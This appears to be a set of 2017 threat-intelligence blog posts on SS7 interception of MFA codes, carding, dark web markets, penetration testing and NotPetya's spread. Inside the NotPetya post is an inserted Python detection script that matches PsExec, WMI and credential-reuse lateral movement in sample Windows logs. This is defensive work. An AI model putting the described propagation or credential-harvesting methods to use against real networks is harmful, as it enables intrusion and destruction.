    Recently we came across a service that claimed to provide customers with the ability to redirect phone calls and text messages, advertised on at least one hacking forum for over a year and hosted on the Tor network (see Figure 1). Named “Interconnector” and offering “SS7 Services”, this was probably a reference to Signaling System No. 7 (SS7), the signaling protocol suite that allows the networks of different telecommunications companies to interoperate; it is what lets a subscriber on one network send a message to a subscriber on another, including across borders. If the Interconnector service was genuine (many forum users claimed it was a scam), it would almost certainly be valuable to threat actors. Why? Because the ability to intercept or redirect SMS messages circumvents any MFA that relies on tokens sent over this channel, which may include social media accounts, online bank accounts and the authorization of online transactions.


    Figure 1 – the “Interconnector” SS7 dark web service

    The abuse of SS7 for this purpose isn’t a pipe dream, there are at least a few examples of it being used maliciously in the past. In May 2017, it was reported that criminals had been able to access and steal funds from compromised bank accounts by redirecting SMS messages containing one time tokens and mobile transaction authorization numbers. There was also reporting in 2014 that a number of Ukrainian mobile subscribers’ phone calls had been redirected as a result of custom SS7 packets. The goal of the redirection is unknown at the time of writing.

    Although SS7 abuse is certainly interesting, MFA tokens can also be obtained by other means. For example, the Retefe banking trojan was used alongside mobile malware to harvest SMS codes, while the Dridex banking trojan harvested these codes and its operators used them in real time. Threat actors can also have a target’s messages and calls redirected to a SIM card they control; Wired published a report in June in which it claimed attackers socially engineered employees at a telecommunications company to have a target’s calls and text messages redirected, a technique known as “SIM swapping”. Furthermore, so-called “fake” mobile towers, or International Mobile Subscriber Identity (IMSI) catchers, can be used to intercept mobile traffic.

    All of these methods have their own limitations or requirements to be successful. All of them, for example, require an attacker to first obtain the relevant account credentials before they can consider intercepting MFA tokens. Furthermore, many of the examples we’ve highlighted in this blog require a relatively large amount of effort for the threat actors involved. Of these then, the abuse of SS7 would be most likely to be viable at scale, but the exact level of access and capability required to achieve such an attack isn’t entirely clear.

    Considering the Alternatives

    All of these methods and their use in the wild show that SMS-based two factor authentication (2FA) is not infallible and that criminals have an interest in circumventing it. In this context, it is unsurprising that NIST recommended in 2016 that “M” in MFA should not be SMS.

    Each method has its own advantages and disadvantages as well as capability requirements. However, someone with the appropriate capability and intent could successfully capture SMS-based MFA codes in order to access accounts, or conduct fraudulent transfers. There are some basic mitigation steps individuals could follow, including:

    1. Do not click on links in suspicious or unsolicited emails or text messages
    2. Avoid downloading mobile applications or games from unofficial stores
    3. Run anti-virus software and keep it up to date
    4. Consider alternative MFA methods, such as authenticator applications or hardware tokens

    What is a Threat Model, and Why Organizations Should Care Mon, 31 Jul 2017 14:57:36 +0000 Many organizations are acutely aware that they are the target of a wide range of cyber-attacks, from targeted intrusions to mere vandalism. Financial services companies, defense contractors and critical infrastructure providers are routine and expected targets. However, shifts in how interconnected and interdependent organizations are have changed how attackers see the value of a particular target. As mentioned in our previous blog “Keep your Eyes on the Prize”, how valuable an organization is to an attacker is not necessarily aligned with how important the organization sees itself. To better understand the threats an organization faces, a threat model is typically developed.

    Threat Modeling Process

    Threat modeling is an iterative process that needs to be updated whenever there are substantial changes to either assets or threats. Typically the process consists of:

    1. Defining an organization’s assets – e.g., critical business processes, high-value systems, etc.
    2. Identifying which systems comprise those assets – e.g., databases, Enterprise Resource Planners (ERPs), etc.
    3. Creating a security profile for each system – e.g., which security controls are currently used to protect the identified software applications, such as, firewalls, Endpoint Detection and Response (EDR) systems, web proxies, etc. and which known vulnerabilities are present
    4. Identifying potential threats – e.g., hacktivists, cyber criminals, freelancers, nation states, etc.
    5. Prioritizing potential threats, and documenting adverse events and the actions taken in each case – e.g., working from known examples of documented attacks and internal risk concerns, attempting to foresee what the organizational impact of particular threats could be.

    If your organization does any of the following things, you may find the chosen case studies to be helpful in developing your own threat model:

    If you build things: if an organization builds devices which have internet connectivity, it needs a Secure Development Lifecycle (SDL).  The Mirai botnet illustrated this point by hijacking internet-connected devices which were not considered to be critical assets. The devices in question had default passwords and were connected to the public internet. Armed with a simple list of passwords, DVR appliances were readily compromised by Mirai and harnessed together to flood targets with up to 1.2Tbps of traffic.

    If you make software: widely-deployed or strategically-deployed software is an attractive target for attackers. Backdooring carefully chosen software allows an attacker to gain access to a particular target. The Nyetya attack showed how a widely-deployed piece of software in a particular geography can become an extremely attractive target, effectively giving the attackers access to over 400,000 endpoints with a single malicious update. The Havex malware was used in a campaign targeting Industrial Control Systems (ICS) that, among other vectors, backdoored the software installation files of three different ICS vendors. Compromises of this nature deliver the attacker’s malware directly to their targets through a trusted channel, most likely bypassing perimeter and other security controls.

    If you have an internet presence: attackers are always on the lookout for deniable infrastructure to use in their campaigns. Infrastructure that has a good level of connectivity and a poor security posture is ideal. It is no surprise that attackers such as the Equation Group used cloud hosted virtual machines and university computers to redirect traffic towards their targets. While asset owners may not consider their assets to be particularly sensitive, the value of having a reliable, deniable infrastructure which attackers can freely use for their own purposes is very high. The feasibility and speed of Internet-wide scanning means that vulnerable internet-connected machines do not remain undetected for long.

    If you store data: many organizations collect large amounts of data for their own purposes. In particular, data and metadata around how their customers are using their system. This data may well be part of an attacker’s collection requirements. The Equation Group compromise of Eastnets and potentially other SWIFT Service Bureaus shows that, while the organizations may consider security as part of their regular operations, they may face attacks from actors with a significantly higher capability than what they anticipated due to the perceived value of the data that they hold.

    Security is a global, pervasive responsibility for all organizations. It is clear that many organizations that did not consider themselves high-value targets, or did not think they carried a high degree of responsibility for security, may need to reconsider. Paranoia and hysteria are to be avoided, but a sober analysis of the real risks to an organization and, by extension, to the other organizations or people that depend on it, is essential. An understanding of attacker goals and security engineering principles, coupled with a robust approach to threat modelling, goes a long way to reducing the uncertainty around the risk to an organization.

    Fraudsters Scoring Big – an Inside Look at the Carding Ecosystem Tue, 18 Jul 2017 18:52:49 +0000 In season two of the Netflix series Narcos, Pablo Escobar points out that: “I’m not a rich person. I’m a poor person with money.” In real life, Escobar’s cartel reportedly made so much money (at one point US$420 million a week) that their chief accountant, Roberto Escobar, claimed that they “would write off 10% of the money because the rats would eat it in storage or it would be damaged by water or lost.” This “poor” person certainly had a lot of money.

    Online carding is another industry that is consistently lucrative for criminals, with payment card fraud projected to reach $24 billion by the end of 2018. Our latest whitepaper reveals how criminals develop their capabilities and highlights a professional e-learning carding course, complete with webinars, instructors and reading material. The increased professionalization and sophistication of this fraud has negative implications for credit card companies, merchants and consumers.


    Figure 1: An English translation of the carding course overview


    Whatever happened to EMV? Wasn’t payment card fraud meant to have been solved by the introduction of Chip and PIN? The implementation of EMV in the US has had its own problems. As I went to use my card over the weekend, I was prompted with the all-too-familiar message “No chip. Please swipe”.


    Figure 2: Many United States’ EMV terminals are disabled and force customers to swipe instead

    Recent research indicates that the increasing adoption of EMV has made physical card fraud more difficult, making Card Not Present (CNP) fraud more popular. CNP fraud occurs when the customer doesn’t physically present the card and uses card details online or over the phone. If we consider that annual online card spending will double to $6 trillion by 2021, this is a growth industry for cybercriminals.

    Just as in Narcos’ cocaine empire, CNP fraud is unlikely to be achieved by a criminal acting alone. They rely on a sophisticated ecosystem and support network that provides a wide range of credit card details, fraud tools and online tutorials. This includes:

    • Payment Card Data Harvesters – do the ‘dirty work’ of harvesting the payment card information. This is done by intercepting cardholders’ information through point-of-sale malware, skimming devices, phishing, breached databases, or botnets
    • Distributors – are the ‘middle men’ who typically make the most money. While the criminals who harvest may use the card data themselves, they also sell it on to others who package, repackage and resell the card information
    • Fraudsters – run the most risk in terms of getting caught by law enforcement or being conned by fellow criminals. Once fraudsters have acquired payment card information from their distributor, the fraud can happen. These individuals tend to be less technical and attract a lower calibre of cybercriminal, often relying on online guides and courses to learn the latest techniques
    • Monetization – there are many different roles within this stage, including those who have been duped into operating drop addresses and those involved in reselling fraudulently acquired goods

    Payment card fraud is not new, nor are online guides and courses for the fraudsters. However, the professionalism, reputation and freshness of this course provides useful insights for organizations across a range of industries as well as consumers. Download a copy of our latest paper to learn about the latest techniques and advice for merchants, payment card companies, and consumers.

    The Future of Marketplaces: Forecasting the Decentralized Model Mon, 17 Jul 2017 16:03:09 +0000 Last week we wrote about the disappearance of AlphaBay dark web marketplace and assessed three potential scenarios to look out for next. We briefly alluded to new models for criminal online commerce, such as those espoused by OpenBazaar. In this blog, we wanted to drill down into the drivers that would contribute to an increased interest in decentralized marketplaces.

    AlphaBay’s disappearance has highlighted a continuing problem with the marketplace model: users must trust site operators and other users who are anonymous, willing to commit crimes, and potentially untrustworthy. Other issues with the marketplace model include sites’ vulnerability to law enforcement; by targeting site operators law enforcement agencies can potentially seize servers and gather intelligence on users, shut a site down entirely, or even take it over and run it as a “honeypot”. In this case, a honeypot would be a deception operation in which law enforcement attempts to attract criminal actors engaged in illicit activity to use a law enforcement operated service in order to facilitate information gathering.

    An alternative model that precludes many of these issues is presented by P2P decentralized marketplaces, as recent reporting from DeepDotWeb regarding a dark web marketplace project on the Ethereum platform dubbed “Tralfalmadore” has demonstrated.

    What is a Decentralized Marketplace?

    Decentralized marketplaces use blockchain technology: a project blockchain serves as the back-end for the marketplace, storing the necessary databases and code to support front-end user interfaces. All transactions are made using cryptocurrency and are recorded as smart contracts on the blockchain. This addresses problems with user trust — if all transactions are permanently and immutably recorded, vendors who attempt to scam other users can be more easily identified. Furthermore, platform operators have no control over listings and the platform is split among many nodes, making it highly resilient to law enforcement takedowns or attacks by other criminal actors.

    Forecasting Development

    In addition to Tralfalmadore, a project dubbed OpenBazaar has been active since Apr 2016. Despite its advantages over a traditional marketplace, the platform has not been used for criminal activity to any great extent and support for the decentralized model within the criminal ecosystem has remained low. Our monitoring of criminal sites has indicated that a significant proportion of former AlphaBay users have migrated to Hansa, another marketplace platform. Based on an examination of criminal forums and discussion boards, we have identified the following drivers likely to be significant in future development of decentralized criminal marketplaces.


    Figure 1 – Table of drivers likely to influence the development of decentralized criminal marketplaces.

    We assess that it is unlikely decentralized criminal marketplaces will become widely adopted in the near to mid-term future; at the time of writing, traditional marketplaces and P2P interactions on forums have remained by far the most common platforms for criminal commercial enterprises. Furthermore, no platform with popular appeal to criminal actors yet exists.

    However, if projects such as Tralfalmadore are able to become established, they are likely to become more widely used in the long term. Drivers identified in this article are likely to be viable measures for assessing the prospects of newly established decentralized criminal marketplaces.

    The potential future emergence of decentralized marketplaces within the criminal ecosystem poses significant challenges for law enforcement agencies and private security vendors. Although public blockchains can be freely mined for data, the very high volume of content is likely to make parsing this information and developing actionable intelligence very technically and logistically challenging. Furthermore, previous law enforcement operations targeting criminal marketplaces or forums have tended to revolve around targeting site operators or geolocating servers and conducting raids; neither of these would likely be effective for targeting a decentralized platform. In this scenario, it would be more effective to target individual prominent vendors or vendor networks and attempt to identify and locate them.

    Therefore, although decentralized marketplaces are unlikely to become significant within the criminal ecosystem in the near to mid-term future, they potentially represent a significant longer-term challenge for law enforcement and security vendors.

    AlphaBay Disappears: 3 Scenarios to Look For Next Fri, 14 Jul 2017 10:44:46 +0000 The AlphaBay dark web marketplace has been inaccessible since 05 Jul 2017. With no substantive explanation from the site’s owners, users have speculated that either an exit scam (where administrators steal user cryptocurrency deposited to the marketplace and shut down the services) or law enforcement action has taken place. Dark web market exit scams are nothing new; the Evolution market exit scam infamously resulted in the loss of 40,000 bitcoins ($12 million). These exit scams are one of the risks of conducting business in criminal marketplaces. On 13 Jul 2017 the Wall Street Journal claimed that the disruption was caused by a combined US, Canadian and Thai law enforcement operation in which Canadian national Alexandre Cazes was arrested in Bangkok. Cazes, who was reportedly suspected of acting as an AlphaBay administrator, was reported to have committed suicide in Thai custody. At the time of writing there had been no official confirmation of the claims made by the Wall Street Journal. With each day that passes the prospect of AlphaBay returning becomes increasingly unlikely.

    So, what would a post-AlphaBay future look like? We believe there are at least three possible scenarios:

    1. An older, established marketplace will replace AlphaBay.

    As is often the case when a popular marketplace disappears, users will simply migrate to other established sites. Already we have seen former AlphaBay vendors advertising their products on other marketplaces, including Hansa and Dream Market. Sellers have leveraged their AlphaBay vendor ratings as a measure of their trustworthiness and reputation. Relocation is made easier as many established vendors and regular customers would have already had multiple accounts across the major markets.


    Figure 1: Hansa vendor highlighting their AlphaBay credentials

    With AlphaBay seemingly out of the picture, other sites will jostle for supremacy by trying to attract new users through advertising and membership deals. RS Club Market, for example, announced a referral offer on 09 Jul 2017 (a few days after AlphaBay’s disappearance) encouraging members to invite new users in return for 30% of the site’s commission fee. The House of Lions marketplace, similarly, has given AlphaBay sellers an opportunity to negotiate on the vendor fee if they can verify their experience and reputation.


    Figure 2: The House of Lions market has actively targeted former AlphaBay vendors

    Enlarging your customer base, however, brings its own challenges. Hansa users have reported issues with accessing the site in the last week. As Hansa does not require users to log in to view products, a large increase in web traffic may have disrupted the service. Hansa administrators have now been forced to suspend new registrations as they deal with “technical issues” caused by what they have called an “AlphaBay refugee” influx.


    Figure 3: Hansa has struggled to cope with the deluge of new registrations

    2. A new marketplace will arise from AlphaBay’s ashes

    Some AlphaBay users were so fond of their former haunt that they have created a new iteration of the marketplace, dubbed GammaBay. We discovered the following call to arms by a self-described AlphaBay veteran on Reddit: 


    Figure 4: Reddit post promoting GammaBay


    Figure 5: GammaBay site imitates the old AlphaBay design

    At this stage, the GammaBay site is still in its infancy, and the marketplace section remains unfinished. With only 20 members registered on the site so far, it is unlikely the new site will be able to reach the heights of its predecessor. Moreover, with rumors that AlphaBay had been disrupted by law enforcement, many users have expressed a reluctance to register for GammaBay, fearing that the site is actually a honeypot intended to lure in former AlphaBay vendors. Perceived trust in a market will play a large role in its chances of future success.


    Figure 6: Reddit user stating their suspicions about GammaBay

    3. Users will abandon the marketplace model and look for alternative solutions

    The fallout from AlphaBay’s disappearance could have far-reaching implications for the future of the marketplace model. If an exit scam has taken place, the declining trust in these markets may lead disillusioned users towards alternative methods for conducting online transactions. If law enforcement was responsible, then the risk of legal action will only encourage vendors to seek more secure and anonymized methods of trade.

    Although sites such as AlphaBay are very popular for goods such as drugs and credit card information, cybercriminals selling sensitive data or malware variants have frequently opted for direct peer-to-peer (P2P) communication and relationships made on specialized forums. While vendors and customers might lose the convenience of trading on a popular marketplace, they could decide that a P2P model will give them more control and help safeguard against exit scams and loss of funds.

    Following the seizure of Silk Road in 2013, some people began working on a new, fully-decentralized marketplace known as OpenBazaar. This open source project is a P2P marketplace that allows the unrestricted sale of goods between anonymous users. OpenBazaar is accessed through a front-end client which can be freely downloaded from the project website. All payments are made using Bitcoin, and orders take the form of cryptographically signed contracts exchanged directly between the parties rather than listings held on a marketplace operator’s server.

    The Post-AlphaBay Future: Short- and Long-term Forecasts

    In the short-term, we assess that an existing marketplace such as Dream Market or Hansa will most likely fill AlphaBay’s shoes. The most successful marketplaces usually have a combination of: a user-friendly interface, administrator support services, attractive fee structures, and – crucially – a strong overall level of stability and reputation among the online community. As perhaps the two most established markets with the largest number of existing users, Dream Market and Hansa are best placed to capitalize. Nonetheless, as Hansa’s recent technical difficulties have highlighted, these sites will have to undertake improvements to ensure their user experience is in line with what members will demand. For Hansa and Dream Market, this will mean minimizing technical issues and refining their associated forum pages, which both pale in comparison to what the AlphaBay forum once offered.

    In the long-term, the fall of yet another popular dark web marketplace will only increase calls for a more secure, stable and trustworthy alternative to the current marketplace model. Here we believe P2P models such as that espoused by OpenBazaar have the potential to become increasingly attractive offerings to vendors and customers alike. It remains to be seen when a suitable platform will finally break through and disrupt the market. Digital Shadows will continue to track the demise of AlphaBay and its successors.

    Our next blog will explore the prospect of decentralized marketplaces in further detail.

    Threat Led Penetration Testing – The Past, Present and Future Mon, 10 Jul 2017 23:01:33 +0000 What is Threat Led Penetration Testing?

    Threat led penetration testing is, in essence, the use of threat intelligence to emulate the tactics, techniques and procedures (TTPs) of an adversary against a live, mission-critical system. The concept is currently being implemented in a number of ‘flavors’ around the globe, including the UK’s CBEST and STAR (Simulated Target Attack and Response) schemes, the Netherlands’ TIBER (Threat Intelligence Based Ethical Red teaming) scheme and Hong Kong’s iCAST scheme.

    The recent quarter has seen some extremely significant development within the realm of threat led penetration testing (TLPT). The concept of TLPT is rapidly expanding beyond the United Kingdom. TLPT advances the boundaries of conventional penetration testing by seeking to adopt the tactics, techniques and procedures of an advanced threat actor aggressively targeting a critical system. You can read more about TLPT in a previous blog. Our work with the first two Dutch TIBER projects, as well as our workshop at the Bahrain International Cyber Security Forum & Expo, are great examples of this.

    Given this expansion, I wanted to review where the TLPT concept has come from and where it may be going.

    The Past

    The origins of TLPT began with the UK’s CBEST scheme in 2013, to which Digital Shadows was a major contributor both in terms of the development of the original framework and the implementation of the actual projects. Since then, there have been around fifty CBEST-style engagements, of which Digital Shadows has carried out the majority, and from which three lessons have emerged:

    1. It has to be testable. Any testing scenario put forward by the Threat Intelligence provider has to be testable by the penetration test partner, within the scope of their capabilities. In practice this means less abseiling through open windows and more focus on technical exploits, such as the indicators of compromise associated with specific threat groups.
    2. The importance of the ‘golden thread’. This is an easy concept to outline but a challenge to implement. As the report moves from the initial quantitative, data collection stages to the later, qualitative scenario building, the report should create activities linking data, information and intelligence into a “golden thread”. In practice doing this is really quite simple, for example taking client emails that have been implicated in various data breaches and focusing phishing campaigns against them.
    3. Creative versus effective scenarios. The culmination of a TLPT (the TI phase at least) revolves around the attack scenario, following the Exposition, Rising Action, Climax, Falling Action and Dénouement structure. While it can be tempting to devise elaborate scenarios, it’s important to remember that the core objective of a scenario is to successfully compromise the target system at the lowest level technically possible.

    The Present

    The CBEST scheme has been a huge success, which has led to the concept of TLPT being expanded beyond the financial services in the UK. Currently Hong Kong and the Netherlands have ‘in flight’ schemes with Singapore and the United States considering implementing their own proprietary schemes.

    • Sector diversification is happening, specifically across the telecoms, nuclear, wider energy and even space sectors. Although the sectors are varied, the principle of TLPT is the same – to test real-time, in-flight critical systems using the TTPs of real-world threat actors.
    • Regional expansion is rapidly occurring with Hong Kong, Singapore, The Netherlands and the USA all looking to develop and implement variants of TLPT.

    The Future

    It is worth speculating about some of the features that I feel will become fixtures within TLPT in the future.

    • Iterative development of scenarios within the penetration test phase. Future TLPT will iteratively update the threat profiles based upon the results of the penetration test phase. This will result in a set of scenarios that are all viable but only under specific sets of circumstances. This would shift the current scenario metric from ‘viable or not?’ to a more nuanced ‘viable under these circumstances’, for example a high-level insider threat combined with a zero-day vulnerability. This would create a situation where defenders could then assess the likelihood of a scenario coming to fruition based on the threat actor involved and the level of defences in place.
    • Reuse of the result. On average, the results of a TLPT have a shelf life of between 18 and 24 months. Therefore, the organization has the opportunity to reuse the final result for a number of technical and non-technical exercises, such as a crisis management workshop for executive leadership.
    • Broader range of organizational testing. There is huge potential for TLPT to expand out from just being a technical test to encompass non-technical elements of the client organization’s risk management framework, such as crisis management workshops and media management workshops.

    The success of the CBEST scheme and its subsequent expansion suggests that threat led penetration testing is an exciting trend. Of course, CBEST and TIBER are evolving rapidly, so future adoption by providers and users cannot be predicted with certainty. However, by building on past successes and learning lessons, threat led penetration testing could go from strength to strength.

    Petya-Like Wormable Malware: The “Who” and the “Why” Fri, 30 Jun 2017 16:15:38 +0000 Late on 27 June, the New York Times reported that a number of Ukrainian banks and Ukrenergo, the Ukrainian state power distributor, had been affected by unidentified malware which caused significant operational disruption. Multiple security vendors and independent researchers subsequently identified the malware as a wormable ransomware variant with functional and technical similarities to Petya. Based on these similarities and continuing confusion, the malware has been dubbed Nyetya, Petna, ExPetr, and NotPetya, among others. It has been linked with a large number of infections, a significant proportion of which (around 60% according to statistics published by Kaspersky) affected machines in Ukraine, though at the time of writing the overall number of infections is not known.

    How NotPetya Works

    On 27 June, a social media account used by the National Police of Ukraine Cyberpolice Department suggested that the reported infections originated from a compromised software update delivered to users through MeDoc, a Ukrainian accounting software provider. While MeDoc has denied this, Microsoft has confirmed that a small number of infections were the result of malware being delivered to machines by MeDoc’s software update process. Once the malware was installed, intra-network propagation functions enabled it to rapidly spread between networked machines over the following vectors:

    • EternalBlue and EternalRomance exploits: EternalBlue and EternalRomance are exploits for SMB remote code execution vulnerabilities (CVE-2017-0144 and CVE-2017-0145) leaked by the Shadow Brokers in April. These exploits were reportedly used to propagate between networked machines running SMB. Patches for these vulnerabilities were released by Microsoft in March (MS17-010) and in May.
    • PsExec: The ransomware used a tool similar to Mimikatz to harvest user credentials. These credentials were then passed to an older version of the PsExec Windows tool, which was dropped by the malware. This tool then attempted to use PowerShell remote functionality to copy itself onto a target machine and begin execution.
    • Windows Management Instrumentation (WMI): The malware also enumerated Windows network shares with WMI and attempted to launch a copy of itself on any discovered network shares.

    Figure 1 below shows a possible deployment and propagation process for the malware.


    Figure 1 – Deployment and intra-network propagation
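    The credential-reuse, PsExec and WMI vectors listed above each leave a footprint in standard Windows event logs, which is where a defender would look first. The following is an added example (not code from the original post or from Digital Shadows) of three small detections run over constructed sample events: a service installation (System log event 7045) whose name matches PsExec’s default `PSEXESVC` service, a process creation (Security log event 4688) whose parent is the WMI provider host `WmiPrvSE.exe`, and one account performing network logons (event 4624, logon type 3) to many hosts from a single source. Host names, accounts, addresses and the simplified field names are all assumptions made for the sample.

```python
from collections import defaultdict

PSEXEC_SERVICE_NAMES = {"psexesvc"}   # default service name installed by Sysinternals PsExec
WMI_PROVIDER_HOST = "wmiprvse.exe"    # WMI Provider Host; processes launched over remote WMI run under it
NETWORK_LOGON = 3                     # Windows logon type 3 (network logon, e.g. SMB/RPC)

# Constructed sample events (hypothetical hosts, accounts and addresses). Field names are a
# simplified rendering of the Windows event data, not a real log export.
SAMPLE_EVENTS = [
    # ordinary network logon to a file server
    {"time": "2017-06-27T10:30:05", "host": "FS-01", "channel": "Security", "event_id": 4624,
     "logon_type": NETWORK_LOGON, "account": "CORP\\alice", "src_ip": "10.0.0.21"},
    # one account authenticating to many workstations from one source within seconds
    {"time": "2017-06-27T10:41:12", "host": "WS-02", "channel": "Security", "event_id": 4624,
     "logon_type": NETWORK_LOGON, "account": "CORP\\svc_acct", "src_ip": "10.0.0.50"},
    {"time": "2017-06-27T10:41:13", "host": "WS-03", "channel": "Security", "event_id": 4624,
     "logon_type": NETWORK_LOGON, "account": "CORP\\svc_acct", "src_ip": "10.0.0.50"},
    {"time": "2017-06-27T10:41:14", "host": "WS-04", "channel": "Security", "event_id": 4624,
     "logon_type": NETWORK_LOGON, "account": "CORP\\svc_acct", "src_ip": "10.0.0.50"},
    {"time": "2017-06-27T10:41:15", "host": "WS-05", "channel": "Security", "event_id": 4624,
     "logon_type": NETWORK_LOGON, "account": "CORP\\svc_acct", "src_ip": "10.0.0.50"},
    # PsExec-style remote service installation on WS-02 (System log, event 7045)
    {"time": "2017-06-27T10:41:20", "host": "WS-02", "channel": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    # benign service installation, should not be flagged
    {"time": "2017-06-27T09:00:00", "host": "WS-09", "channel": "System", "event_id": 7045,
     "service_name": "BackupAgent", "image_path": "C:\\Program Files\\Backup\\agent.exe"},
    # process started under the WMI provider host on WS-03 (Security log, event 4688)
    {"time": "2017-06-27T10:41:25", "host": "WS-03", "channel": "Security", "event_id": 4688,
     "parent_process": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "new_process": "C:\\Windows\\System32\\cmd.exe"},
    # ordinary interactive process creation, should not be flagged
    {"time": "2017-06-27T10:42:00", "host": "WS-03", "channel": "Security", "event_id": 4688,
     "parent_process": "C:\\Windows\\explorer.exe",
     "new_process": "C:\\Windows\\System32\\notepad.exe"},
]


def _basename(path):
    """Last path component, lower-cased; accepts both \\ and / separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_psexec_service(events):
    """Event 7045 service installs whose name or binary matches PsExec's default service."""
    hits = []
    for e in events:
        if e.get("channel") == "System" and e.get("event_id") == 7045:
            name = e.get("service_name", "").lower()
            if name in PSEXEC_SERVICE_NAMES or _basename(e.get("image_path", "")) == "psexesvc.exe":
                hits.append({"vector": "psexec", "host": e["host"], "time": e["time"],
                             "detail": e["service_name"]})
    return hits


def detect_wmi_spawned_process(events):
    """Event 4688 process creations whose parent is the WMI provider host."""
    hits = []
    for e in events:
        if e.get("channel") == "Security" and e.get("event_id") == 4688:
            if _basename(e.get("parent_process", "")) == WMI_PROVIDER_HOST:
                hits.append({"vector": "wmi", "host": e["host"], "time": e["time"],
                             "detail": e["new_process"]})
    return hits


def detect_logon_fanout(events, threshold=3):
    """(account, source IP) pairs with network logons to at least `threshold` distinct hosts.
    One credential reaching many hosts is the footprint of credential-reuse lateral movement,
    whichever tool carries it. A production rule would also bound the time window; this
    example counts distinct hosts only."""
    targets = defaultdict(set)
    for e in events:
        if e.get("event_id") == 4624 and e.get("logon_type") == NETWORK_LOGON:
            targets[(e["account"], e["src_ip"])].add(e["host"])
    return [{"vector": "fanout", "account": acct, "src_ip": ip, "detail": sorted(hosts)}
            for (acct, ip), hosts in sorted(targets.items()) if len(hosts) >= threshold]


def run_detections(events, fanout_threshold=3):
    """All findings from the three detectors, in one list."""
    return (detect_psexec_service(events) + detect_wmi_spawned_process(events)
            + detect_logon_fanout(events, fanout_threshold))


if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(finding)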

    Once installed, the malware functioned similarly to Petya, checking for the availability of Administrator privileges by using the Windows API AdjustTokenPrivileges function. If this was successful, the malware would overwrite the infected machine’s Master Boot Record (MBR), rendering it unbootable. If this was not possible, AES-128 keys were used to encrypt each individual file, with the AES keys subsequently being encrypted using an RSA-2048 public key. To obtain the private RSA key necessary to recover the AES keys, victims were instructed to transfer $300 USD in Bitcoin to a specified Bitcoin ID and send their wallet ID and victim ID number in an email to a specified address.


    While the malware’s functionality has reportedly made it highly effective at propagating to machines within a local network, it has been reported as having no function for spreading outside of these local networks. It was therefore assessed as likely to be much more effective for conducting targeted attacks than wCry (AKA WannaCry).

    In the case of NotPetya, it is highly likely that the ransom payment method was never intended to result in revenue for attackers or the recovery of victim data. Although the email service provider with which the account was registered has publicly announced that this account has been disabled, it has subsequently been reported that victim ID numbers were pseudo-randomly generated rather than being derived from the RSA key used for AES key encryption. This indicates that it would not be possible for the threat actors to provide victims with the correct decryption key, even if a victim had paid the ransom and succeeded in making contact. Furthermore, Matt Suiche has reported that, unlike Petya, which encrypts an infected machine’s MBR in a reversible manner, this malware reportedly irreversibly overwrote 24 sector blocks of the MBR section of an infected machine’s disk, rendering it permanently inoperable.

    With monetary gain as a motivation out of the picture, the most likely remaining motivation for NotPetya’s behavior is destructive malicious intent. Malicious intent is not synonymous with any single ‘class’ of threat actor: hacktivists ‘do it for the lulz’; nation state actors conduct malicious cyber-attacks to fulfill geostrategic objectives. With this in mind, NotPetya does demonstrate an advanced understanding of how to mount a widespread, hard-hitting cyber-attack, and to capitalize on this attack with maximum media exposure.


    Clues lie in the geopolitical context and the initial target geography of the malware. Kaspersky Labs have claimed a 60/30% split (total number of infections unknown) between Ukraine and Russia. Additionally, the initial attack occurred during the Ukrainian holiday celebrating independence from Russia. If one subscribes to the theory that Russian state or affiliated actors are responsible, this had the tactical effect of delaying a coherent response from Ukrainian defenders and strategically punishing Ukraine for its independence from Russia. Although these facts are interesting – and they do suggest that the malware was actively aimed at the Ukrainian economy – they are circumstantial and do not conclusively link the incident to any particular nation state. Attribution is and will continue to be a challenge.

    The technology behind this attack is well within the range of many hacktivists and cyber criminals, and so these details have less diagnostic value when considering the ‘who’. Although speculative, there are other factors to consider: the supply chain compromise, efforts at obfuscation (hiding the wiper as ransomware), the geography that the malware was deployed in, and the timing of the deployment with Ukrainian national holidays. These point towards an attacker with political motivations behind the attack. It seems that the actor behind the NotPetya variant was politically motivated with an exceptional appetite to conduct cyber-attacks against specific organizations within the Ukraine target geography.

    Longer-Term Implications

    So where does this incident leave the longer-term assessment of the implications of NotPetya?

    • Prepare for stray bullets. Many organizations were impacted by the NotPetya campaign. The interconnectivity of modern systems and the ubiquity of applications means that enterprises could find themselves the victims of attacks not specifically targeting their organizations.
    • The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    Sadly, cyber-attacks of this nature are not uncommon and so businesses, governments and of course consumers need to take steps to protect themselves against ransomware attacks.

    1. The “basics” aren’t easy, but they should not be forgotten. Both NotPetya and the earlier WannaCry exploited basic and known security vulnerabilities, so segmenting networks and applying basic patching cycles will go a long way to mitigating threats such as this, including the ‘stray bullet’ factor outlined above.
    2. Think about the soft factors. Defense is not just about technical indicators and warning anymore; ‘soft’ factors such as motivation and geostrategic issues are now not just ‘nice to haves’ but are increasingly critical in the response to malware like NotPetya.
    3. Plan to fail. No amount of good security will entirely remove the risk posed by cyberattacks, so it is critical to back up critical data and systems on a regular basis and ensure crisis management and comprehensive data recovery plans are in place and practiced. Extortion and destructive malware response should be in your incident response playbooks.
    4. If you aren’t already doing so, think about the digital risks associated with your supply chain. Sure, not all suppliers are attack vectors for targeted attacks, but many suppliers do not have mature levels of security. Regardless of the alleged culpability of MeDoc, the deployment mechanism does highlight the attention that we all need to start paying to supply chain compromise.
    5. Defense in depth. Digital Shadows advocate using a ‘defense in depth’ strategy guided by four main principles: configuring host-based firewalls and using IP-whitelisting measures, segmenting networks and restricting workstation-to-workstation communication, applying patches and disabling unneeded legacy features, and restricting access to important data to only those who are required to have it.

    WannaCry and NotPetya are a sign of things to come, and you can expect attackers will improve their future campaigns.

    Keep Your Eyes on the Prize: Attack Vectors are Important But Don’t Ignore Attacker Goals Fri, 23 Jun 2017 16:45:41 +0000 Reporting on intrusions or attacks often dwells on the method that the attackers used to breach the defenses of a particular organization. However, the goals of the attacker are the most relevant to how an organization can protect itself. The goals of attackers reflect the perceived value of the critical assets an organization has to the attackers, which is independent from the value these assets have to the organization.

